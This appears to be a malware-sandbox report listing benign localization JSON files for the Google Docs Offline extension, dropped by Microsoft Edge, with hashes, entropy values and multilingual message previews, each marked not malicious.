SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:false
Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):977
Entropy (8bit):4.867640976960053
Encrypted:false
SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:9A798FD298008074E59ECC253E2F2933
SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:false
Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):3107
Entropy (8bit):3.535189746470889
Encrypted:false
SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:68884DFDA320B85F9FC5244C2DD00568
SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:false
Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1389
Entropy (8bit):4.561317517930672
Encrypted:false
SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:2E6423F38E148AC5A5A041B1D5989CC0
SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:false
Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1763
Entropy (8bit):4.25392954144533
Encrypted:false
SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:651375C6AF22E2BCD228347A45E3C2C9
SHA1:109AC3A912326171D77869854D7300385F6E628C
SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:false
Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):930
Entropy (8bit):4.569672473374877
Encrypted:false
SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:D177261FFE5F8AB4B3796D26835F8331
SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:false
Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):913
                                                                                                                                                                Entropy (8bit):4.947221919047
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):806
                                                                                                                                                                Entropy (8bit):4.815663786215102
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):883
                                                                                                                                                                Entropy (8bit):4.5096240460083905
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1031
                                                                                                                                                                Entropy (8bit):4.621865814402898
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1613
                                                                                                                                                                Entropy (8bit):4.618182455684241
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):851
                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):851
                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):848
                                                                                                                                                                Entropy (8bit):4.494568170878587
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1425
                                                                                                                                                                Entropy (8bit):4.461560329690825
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):961
                                                                                                                                                                Entropy (8bit):4.537633413451255
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):959
                                                                                                                                                                Entropy (8bit):4.570019855018913
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):968
                                                                                                                                                                Entropy (8bit):4.633956349931516
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):838
                                                                                                                                                                Entropy (8bit):4.4975520913636595
                                                                                                                                                                Encrypted:false
